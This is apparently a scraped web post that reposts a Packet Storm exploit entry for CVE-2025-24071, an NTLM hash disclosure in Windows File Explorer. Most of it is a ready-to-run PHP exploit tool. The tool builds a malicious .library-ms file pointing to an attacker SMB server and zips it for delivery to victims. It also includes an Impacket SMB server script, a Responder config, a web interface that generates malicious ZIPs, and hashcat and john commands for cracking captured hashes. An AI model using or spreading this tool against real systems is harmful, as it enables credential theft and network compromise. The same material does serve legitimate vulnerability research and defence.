{"id":28896,"date":"2025-12-05T13:40:44","date_gmt":"2025-12-05T13:40:44","guid":{"rendered":"http:\/\/localhost\/?p=28896"},"modified":"2025-12-05T13:40:44","modified_gmt":"2025-12-05T13:40:44","slug":"microsoft-windows-file-explorer-ntlm-hash-disclosure","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28896","title":{"rendered":"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-05T18:53:16&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by exploiting the automatic parsing of .library-ms files from ZIP archives,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212497&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24071&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Windows File Explorer NTLM v2 Hash Disclosure\\n                                                                    |\\n    | # Author    : indoushka\\n                                                                    |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64\\n    bits)                                                            |\\n    | # Vendor    : System built\u2011in component.No standalone download available\\n                                                                     |\\n    =============================================================================================================================================\\n    \\n    [+] References :  https:\/\/packetstorm.news\/files\/id\/197740\/ \\u0026\\n    CVE-2025-24071\\n    \\n    [+] Summary :\\n                Windows File Explorer in Windows 10 and 11 contains a critical\\n    NTLM hash disclosure vulnerability that allows attackers to capture user\\n    authentication\\n    credentials by exploiting the automatic parsing of .library-ms files from\\n    ZIP archives, leading to potential domain compromise through credential\\n    relay attacks.\\n    The vulnerability exists in Windows Explorer&#8217;s automatic handling of\\n    .library-ms files extracted from ZIP archives. When a user extracts a\\n    malicious ZIP file,\\n    Explorer automatically attempts to connect to SMB shares specified in the\\n    .library-ms file, leaking NTLMv2 hashes to attacker-controlled servers\\n    without user interaction.\\n    \\n    \\n    [+]  POC :\\n    \\n    php poc.php\\n    \\n    \\u003c?php\\n    \\n    class WindowsNTLMHashDisclosure {\\n    \\n        private $ip;\\n        private $filename;\\n        private $output_dir;\\n        private $keep_files;\\n    \\n        public function __construct($ip, $filename = &#8216;malicious&#8217;, $output_dir =\\n    &#8216;output&#8217;, $keep_files = false) {\\n            $this-\\u003eip = $ip;\\n            $this-\\u003efilename = $filename;\\n            $this-\\u003eoutput_dir = rtrim($output_dir, &#8216;\/&#8217;);\\n            $this-\\u003ekeep_files = $keep_files;\\n        }\\n    \\n        public function banner() {\\n            echo \\&#8221;==================================================\\\\n\\&#8221;;\\n            echo \\&#8221; Windows File Explorer NTLM Hash Disclosure\\\\n\\&#8221;;\\n            echo \\&#8221; CVE-2025-24071 Exploit Tool\\\\n\\&#8221;;\\n            echo \\&#8221; Author: indoushka (PHP Port)\\\\n\\&#8221;;\\n            echo \\&#8221;==================================================\\\\n\\\\n\\&#8221;;\\n        }\\n    \\n        public function create_library_ms() {\\n            $payload = \\u003c\\u003c\\u003cXML\\n    \\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\n    \\u003clibraryDescription xmlns=\\&#8221;http:\/\/schemas.microsoft.com\/windows\/2009\/library\\n    \\&#8221;\\u003e\\n      \\u003csearchConnectorDescriptionList\\u003e\\n        \\u003csearchConnectorDescription\\u003e\\n          \\u003csimpleLocation\\u003e\\n            \\u003curl\\u003e\\\\\\\\\\\\\\\\{$this-\\u003eip}\\\\\\\\shared\\u003c\/url\\u003e\\n          \\u003c\/simpleLocation\\u003e\\n        \\u003c\/searchConnectorDescription\\u003e\\n      \\u003c\/searchConnectorDescriptionList\\u003e\\n    \\u003c\/libraryDescription\\u003e\\n    XML;\\n    \\n            $library_file = $this-\\u003eoutput_dir . &#8216;\/&#8217; . $this-\\u003efilename .\\n    &#8216;.library-ms&#8217;;\\n    \\n            if (!file_put_contents($library_file, $payload)) {\\n                throw new Exception(\\&#8221;Failed to create .library-ms file\\&#8221;);\\n            }\\n    \\n            echo \\&#8221;[+] Created malicious .library-ms file: {$library_file}\\\\n\\&#8221;;\\n            return $library_file;\\n        }\\n    \\n        public function build_zip($library_file) {\\n            $zip_file = $this-\\u003eoutput_dir . &#8216;\/&#8217; . $this-\\u003efilename . &#8216;.zip&#8217;;\\n    \\n            $zip = new ZipArchive();\\n            if ($zip-\\u003eopen($zip_file, ZipArchive::CREATE |\\n    ZipArchive::OVERWRITE) !== TRUE) {\\n                throw new Exception(\\&#8221;Cannot create ZIP file: {$zip_file}\\&#8221;);\\n            }\\n    \\n            $zip-\\u003eaddFile($library_file, basename($library_file));\\n            $zip-\\u003eclose();\\n    \\n            echo \\&#8221;[+] Created ZIP archive: {$zip_file}\\\\n\\&#8221;;\\n            return $zip_file;\\n        }\\n    \\n        public function exploit() {\\n            $this-\\u003ebanner();\\n    \\n            echo \\&#8221;[*] Target SMB Server: {$this-\\u003eip}\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Output Directory: {$this-\\u003eoutput_dir}\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Base Filename: {$this-\\u003efilename}\\\\n\\\\n\\&#8221;;\\n    \\n            \/\/ Create output directory\\n            if (!is_dir($this-\\u003eoutput_dir)) {\\n                if (!mkdir($this-\\u003eoutput_dir, 0755, true)) {\\n                    throw new Exception(\\&#8221;Failed to create output directory:\\n    {$this-\\u003eoutput_dir}\\&#8221;);\\n                }\\n            }\\n    \\n            \/\/ Create malicious .library-ms file\\n            $library_file = $this-\\u003ecreate_library_ms();\\n    \\n            \/\/ Package into ZIP\\n            $zip_file = $this-\\u003ebuild_zip($library_file);\\n    \\n            \/\/ Clean up if not keeping files\\n            if (!$this-\\u003ekeep_files \\u0026\\u0026 file_exists($library_file)) {\\n                unlink($library_file);\\n                echo \\&#8221;[-] Removed intermediate .library-ms file\\\\n\\&#8221;;\\n            }\\n    \\n            $this-\\u003edisplay_instructions($zip_file);\\n    \\n            return $zip_file;\\n        }\\n    \\n        private function display_instructions($zip_file) {\\n            echo \\&#8221;\\\\n\\&#8221; . str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221; EXPLOITATION INSTRUCTIONS\\\\n\\&#8221;;\\n            echo str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;1. Start SMB listener on {$this-\\u003eip}:\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Using Responder: responder -I eth0 -wrf\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Using Impacket: smbserver.py SHARE \/tmp\/smb\\n    -smb2support\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\n2. Deliver ZIP file to victim:\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; File: {$zip_file}\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Methods: Email, USB, Network share, etc.\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\n3. When victim extracts ZIP, Windows Explorer will:\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Automatically parse .library-ms file\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Attempt SMB connection to {$this-\\u003eip}\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Leak NTLMv2 hash to your SMB server\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\n4. Crack the captured hash:\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Use hashcat: hashcat -m 5600 hash.txt wordlist.txt\\\\n\\&#8221;;\\n            echo \\&#8221;   &#8211; Use john: john &#8211;format=netntlmv2 hash.txt\\\\n\\&#8221;;\\n            echo str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n        }\\n    \\n        public static function is_valid_ip($ip) {\\n            return filter_var($ip, FILTER_VALIDATE_IP) !== false;\\n        }\\n    \\n        public function get_file_paths() {\\n            return [\\n                &#8216;library_ms&#8217; =\\u003e $this-\\u003eoutput_dir . &#8216;\/&#8217; . $this-\\u003efilename .\\n    &#8216;.library-ms&#8217;,\\n                &#8216;zip&#8217; =\\u003e $this-\\u003eoutput_dir . &#8216;\/&#8217; . $this-\\u003efilename . &#8216;.zip&#8217;\\n            ];\\n        }\\n    }\\n    \\n    class SMBListenerHelper {\\n    \\n        public static function generate_responder_config($ip) {\\n            $config = \\u003c\\u003c\\u003cCONFIG\\n    ; Responder Configuration for CVE-2025-24071\\n    ; Save as responder.conf\\n    \\n    [Responder Core]\\n    SQL = On\\n    SMB = On\\n    Kerberos = On\\n    FTP = On\\n    POP = On\\n    SMTP = On\\n    IMAP = On\\n    HTTP = On\\n    HTTPS = On\\n    DNS = On\\n    LDAP = On\\n    \\n    ; Network interface\\n    Interface = eth0\\n    \\n    ; Specific IP to listen on\\n    BindIP = {$ip}\\n    \\n    ; Analysis mode (optional)\\n    Analyze = On\\n    CONFIG;\\n    \\n            return $config;\\n        }\\n    \\n        public static function generate_smbserver_script() {\\n            $script = \\u003c\\u003c\\u003cPYTHON\\n    #!\/usr\/bin\/env python3\\n    # Impacket SMB Server for CVE-2025-24071\\n    \\n    from impacket import smbserver\\n    from impacket.ntlm import compute_lmhash, compute_nthash\\n    import argparse\\n    import threading\\n    import sys\\n    \\n    class CVE202524071Server:\\n        def __init__(self, listen_address, share_path):\\n            self.server = smbserver.SimpleSMBServer(listen_address,\\n    listen_address, 445)\\n            self.server.addShare(\\&#8221;SHARE\\&#8221;, share_path)\\n    \\n        def start(self):\\n            print(\\&#8221;[*] Starting SMB server for CVE-2025-24071\\&#8221;)\\n            print(\\&#8221;[*] Waiting for NTLM hash leakage&#8230;\\&#8221;)\\n            self.server.start()\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        parser = argparse.ArgumentParser()\\n        parser.add_argument(\\&#8221;&#8211;ip\\&#8221;, required=True, help=\\&#8221;IP to listen on\\&#8221;)\\n        parser.add_argument(\\&#8221;&#8211;share\\&#8221;, default=\\&#8221;\/tmp\/smb\\&#8221;, help=\\&#8221;Share path\\&#8221;)\\n        args = parser.parse_args()\\n    \\n        server = CVE202524071Server(args.ip, args.share)\\n        server.start()\\n    PYTHON;\\n    \\n            return $script;\\n        }\\n    }\\n    \\n    class HashCrackingHelper {\\n    \\n        public static function display_cracking_commands($hash_file =\\n    &#8216;captured_hashes.txt&#8217;) {\\n            $commands = [\\n                &#8216;hashcat&#8217; =\\u003e \\&#8221;hashcat -m 5600 {$hash_file}\\n    \/usr\/share\/wordlists\/rockyou.txt\\&#8221;,\\n                &#8216;john&#8217; =\\u003e \\&#8221;john &#8211;format=netntlmv2 {$hash_file}\\&#8221;,\\n                &#8216;online_crack&#8217; =\\u003e \\&#8221;Use online services like crackstation.net or\\n    hashes.com\\&#8221;\\n            ];\\n    \\n            echo \\&#8221;\\\\n\\&#8221; . str_repeat(\\&#8221;=\\&#8221;, 50) . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221; HASH CRACKING COMMANDS\\\\n\\&#8221;;\\n            echo str_repeat(\\&#8221;=\\&#8221;, 50) . \\&#8221;\\\\n\\&#8221;;\\n    \\n            foreach ($commands as $tool =\\u003e $command) {\\n                echo \\&#8221;{$tool}: {$command}\\\\n\\&#8221;;\\n            }\\n            echo str_repeat(\\&#8221;=\\&#8221;, 50) . \\&#8221;\\\\n\\&#8221;;\\n        }\\n    \\n        public static function generate_hash_example() {\\n            $example = \\u003c\\u003c\\u003cHASH\\n    Example NTLMv2 Hash Format:\\n    username::domain:challenge:HMAC-MD5:blob\\n    \\n    Actual captured hash will look like:\\n    Administrator::WIN11:1122334455667788:8846F7EAEE8FB117AD06BDD830B7586C:01010000000000000090D336F74CD801B8B5E9545C96D79F000000000200080053004D004200330001001E00570049004E002D0034004300520038004100330056004A0037004B00420004003400570049004E002D0034004300520038004100330056004A0037004B0042002E0053004D00420033002E004C004F00430041004C000300140053004D00420033002E004C004F00430041004C000500140053004D00420033002E004C004F00430041004C00070008000090D336F74CD8010600040002000000080030003000000000000000010000000020000006DE67E84DC5A62919F4D6F6A8F6F6D6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D0A001000000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E003100300030000000000000000000\\n    HASH;\\n    \\n            return $example;\\n        }\\n    }\\n    \\n    \/\/ Command line interface\\n    if (php_sapi_name() === &#8216;cli&#8217; \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) ===\\n    basename(__FILE__)) {\\n    \\n        if ($argc \\u003c 2) {\\n            echo \\&#8221;Windows File Explorer NTLM Hash Disclosure\\n    (CVE-2025-24071)\\\\n\\&#8221;;\\n            echo\\n    \\&#8221;===========================================================\\\\n\\&#8221;;\\n            echo \\&#8221;Usage: php \\&#8221; . $argv[0] . \\&#8221; \\u003cattacker_ip\\u003e [options]\\\\n\\&#8221;;\\n            echo \\&#8221;Example: php \\&#8221; . $argv[0] . \\&#8221; 192.168.1.100\\\\n\\&#8221;;\\n            echo \\&#8221;Example: php \\&#8221; . $argv[0] . \\&#8221; 192.168.1.100 -n payroll -o\\n    .\/malicious_zips &#8211;keep\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nOptions:\\\\n\\&#8221;;\\n            echo \\&#8221;  -n, &#8211;name      Base filename (default: malicious)\\\\n\\&#8221;;\\n            echo \\&#8221;  -o, &#8211;output    Output directory (default: .\/output)\\\\n\\&#8221;;\\n            echo \\&#8221;  -k, &#8211;keep      Keep .library-ms file after ZIP creation\\\\n\\&#8221;;\\n            echo \\&#8221;  &#8211;smb-help      Show SMB listener setup help\\\\n\\&#8221;;\\n            echo \\&#8221;  &#8211;crack-help    Show hash cracking instructions\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n    \\n        $ip = $argv[1];\\n        $filename = &#8216;malicious&#8217;;\\n        $output_dir = &#8216;output&#8217;;\\n        $keep_files = false;\\n    \\n        \/\/ Parse command line options\\n        for ($i = 2; $i \\u003c $argc; $i++) {\\n            switch ($argv[$i]) {\\n                case &#8216;-n&#8217;:\\n                case &#8216;&#8211;name&#8217;:\\n                    $filename = $argv[++$i];\\n                    break;\\n                case &#8216;-o&#8217;:\\n                case &#8216;&#8211;output&#8217;:\\n                    $output_dir = $argv[++$i];\\n                    break;\\n                case &#8216;-k&#8217;:\\n                case &#8216;&#8211;keep&#8217;:\\n                    $keep_files = true;\\n                    break;\\n                case &#8216;&#8211;smb-help&#8217;:\\n                    echo\\n    SMBListenerHelper::generate_responder_config(&#8216;192.168.1.100&#8217;);\\n                    echo \\&#8221;\\\\n\\\\n\\&#8221;;\\n                    echo SMBListenerHelper::generate_smbserver_script();\\n                    exit(0);\\n                case &#8216;&#8211;crack-help&#8217;:\\n                    HashCrackingHelper::display_cracking_commands();\\n                    echo \\&#8221;\\\\n\\&#8221; . HashCrackingHelper::generate_hash_example() .\\n    \\&#8221;\\\\n\\&#8221;;\\n                    exit(0);\\n            }\\n        }\\n    \\n        try {\\n            if (!WindowsNTLMHashDisclosure::is_valid_ip($ip)) {\\n                echo \\&#8221;[-] Invalid IP address: {$ip}\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n    \\n            $exploit = new WindowsNTLMHashDisclosure($ip, $filename,\\n    $output_dir, $keep_files);\\n            $zip_file = $exploit-\\u003eexploit();\\n    \\n            echo \\&#8221;\\\\n[+] Exploit files created successfully!\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Deliver this file to the victim: {$zip_file}\\\\n\\&#8221;;\\n    \\n        } catch (Exception $e) {\\n            echo \\&#8221;[-] Error: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n    }\\n    \\n    \/\/ Web interface for the exploit\\n    if (isset($_GET[&#8216;web&#8217;]) \\u0026\\u0026 $_GET[&#8216;web&#8217;] === &#8216;true&#8217;) {\\n        ?\\u003e\\n        \\u003c!DOCTYPE html\\u003e\\n        \\u003chtml\\u003e\\n        \\u003chead\\u003e\\n            \\u003ctitle\\u003eCVE-2025-24071 &#8211; NTLM Hash Disclosure\\u003c\/title\\u003e\\n            \\u003cstyle\\u003e\\n                body { font-family: Arial, sans-serif; margin: 40px;\\n    background: #f0f0f0; }\\n                .container { max-width: 900px; margin: 0 auto; background:\\n    white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px\\n    rgba(0,0,0,0.1); }\\n                h1 { color: #d32f2f; border-bottom: 2px solid #d32f2f;\\n    padding-bottom: 10px; }\\n                .form-group { margin: 20px 0; }\\n                label { display: block; margin-bottom: 5px; font-weight: bold;\\n    color: #333; }\\n                input[type=\\&#8221;text\\&#8221;] { padding: 10px; width: 300px; border: 1px\\n    solid #ddd; border-radius: 4px; }\\n                button { background: #d32f2f; color: white; padding: 12px 25px;\\n    border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }\\n                button:hover { background: #b71c1c; }\\n                .output { background: #f8f8f8; padding: 15px; border-radius:\\n    4px; margin: 20px 0; white-space: pre-wrap; font-family: monospace; }\\n                .success { color: #388e3c; font-weight: bold; }\\n                .error { color: #d32f2f; font-weight: bold; }\\n                .info-box { background: #e3f2fd; padding: 15px; border-radius:\\n    4px; margin: 15px 0; }\\n            \\u003c\/style\\u003e\\n        \\u003c\/head\\u003e\\n        \\u003cbody\\u003e\\n            \\u003cdiv class=\\&#8221;container\\&#8221;\\u003e\\n                \\u003ch1\\u003eCVE-2025-24071 &#8211; Windows NTLM Hash Disclosure\\u003c\/h1\\u003e\\n    \\n                \\u003c?php\\n                if ($_POST[&#8216;generate&#8217;] ?? false) {\\n                    $ip = $_POST[&#8216;ip&#8217;] ?? &#8221;;\\n                    $filename = $_POST[&#8216;filename&#8217;] ?? &#8216;malicious&#8217;;\\n                    $keep_files = isset($_POST[&#8216;keep_files&#8217;]);\\n    \\n                    if (!empty($ip)) {\\n                        echo &#8216;\\u003cdiv class=\\&#8221;output\\&#8221;\\u003e&#8217;;\\n                        try {\\n                            $exploit = new WindowsNTLMHashDisclosure($ip,\\n    $filename, &#8216;web_output&#8217;, $keep_files);\\n                            $zip_file = $exploit-\\u003eexploit();\\n    \\n                            $file_paths = $exploit-\\u003eget_file_paths();\\n                            if (file_exists($file_paths[&#8216;zip&#8217;])) {\\n                                $file_url = &#8216;web_output\/&#8217; .\\n    basename($file_paths[&#8216;zip&#8217;]);\\n                                echo &#8216;\\u003cp class=\\&#8221;success\\&#8221;\\u003eZIP file generated\\n    successfully!\\u003c\/p\\u003e&#8217;;\\n                                echo &#8216;\\u003cp\\u003e\\u003ca href=\\&#8221;&#8216; . $file_url . &#8216;\\&#8221;\\n    download\\u003eDownload Malicious ZIP File\\u003c\/a\\u003e\\u003c\/p\\u003e&#8217;;\\n                            }\\n                        } catch (Exception $e) {\\n                            echo &#8216;\\u003cp class=\\&#8221;error\\&#8221;\\u003eError: &#8216; . $e-\\u003egetMessage()\\n    . &#8216;\\u003c\/p\\u003e&#8217;;\\n                        }\\n                        echo &#8216;\\u003c\/div\\u003e&#8217;;\\n                    }\\n                }\\n                ?\\u003e\\n    \\n                \\u003cform method=\\&#8221;post\\&#8221;\\u003e\\n                    \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                        \\u003clabel for=\\&#8221;ip\\&#8221;\\u003eYour SMB Server IP:\\u003c\/label\\u003e\\n                        \\u003cinput type=\\&#8221;text\\&#8221; id=\\&#8221;ip\\&#8221; name=\\&#8221;ip\\&#8221;\\n    placeholder=\\&#8221;192.168.1.100\\&#8221; required\\u003e\\n                    \\u003c\/div\\u003e\\n    \\n                    \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                        \\u003clabel for=\\&#8221;filename\\&#8221;\\u003eZIP Filename:\\u003c\/label\\u003e\\n                        \\u003cinput type=\\&#8221;text\\&#8221; id=\\&#8221;filename\\&#8221; name=\\&#8221;filename\\&#8221;\\n    value=\\&#8221;malicious\\&#8221;\\u003e\\n                    \\u003c\/div\\u003e\\n    \\n                    \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                        \\u003clabel\\u003e\\n                            \\u003cinput type=\\&#8221;checkbox\\&#8221; name=\\&#8221;keep_files\\&#8221; value=\\&#8221;1\\&#8221;\\u003e\\n                            Keep .library-ms file (for analysis)\\n                        \\u003c\/label\\u003e\\n                    \\u003c\/div\\u003e\\n    \\n                    \\u003cbutton type=\\&#8221;submit\\&#8221; name=\\&#8221;generate\\&#8221;\\u003eGenerate Malicious\\n    ZIP\\u003c\/button\\u003e\\n                \\u003c\/form\\u003e\\n    \\n                \\u003cdiv class=\\&#8221;info-box\\&#8221;\\u003e\\n                    \\u003ch3\\u003eAbout CVE-2025-24071:\\u003c\/h3\\u003e\\n                    \\u003cp\\u003eThis vulnerability affects Windows File Explorer in\\n    Windows 10\/11. When a user extracts a ZIP file containing a malicious\\n    .library-ms file, Windows Explorer automatically attempts to connect to an\\n    SMB server specified in the file, leaking the user&#8217;s NTLMv2 hash.\\u003c\/p\\u003e\\n    \\n                    \\u003ch3\\u003eExploitation Steps:\\u003c\/h3\\u003e\\n                    \\u003col\\u003e\\n                        \\u003cli\\u003eSet up SMB listener on your server\\u003c\/li\\u003e\\n                        \\u003cli\\u003eGenerate malicious ZIP using this tool\\u003c\/li\\u003e\\n                        \\u003cli\\u003eDeliver ZIP to target user\\u003c\/li\\u003e\\n                        \\u003cli\\u003eCapture NTLM hash when they extract the file\\u003c\/li\\u003e\\n                        \\u003cli\\u003eCrack the hash to obtain credentials\\u003c\/li\\u003e\\n                    \\u003c\/ol\\u003e\\n    \\n                    \\u003cp\\u003e\\u003cstrong\\u003eNote:\\u003c\/strong\\u003e This tool is for educational and\\n    authorized testing purposes only.\\u003c\/p\\u003e\\n                \\u003c\/div\\u003e\\n            \\u003c\/div\\u003e\\n        \\u003c\/body\\u003e\\n        \\u003c\/html\\u003e\\n        \\u003c?php\\n        exit;\\n    }\\n    \\n    ?\\u003e\\n    \\n    \\n    \\n    Greetings to\\n    :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln\\n    (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212497&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:6.5,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212497\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-05T18:53:16&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-28896","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28896\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-05T18:53:16&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28896\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-05T13:40:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28896#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28896\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497\",\"datePublished\":\"2025-12-05T13:40:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28896\"},\"wordCount\":2633,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.5\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28896#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28896\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28896\",\"name\":\"\ud83d\udcc4 Microsoft Windows File Explorer NTLM Hash Disclosure_PACKETSTORM:212497 - zero 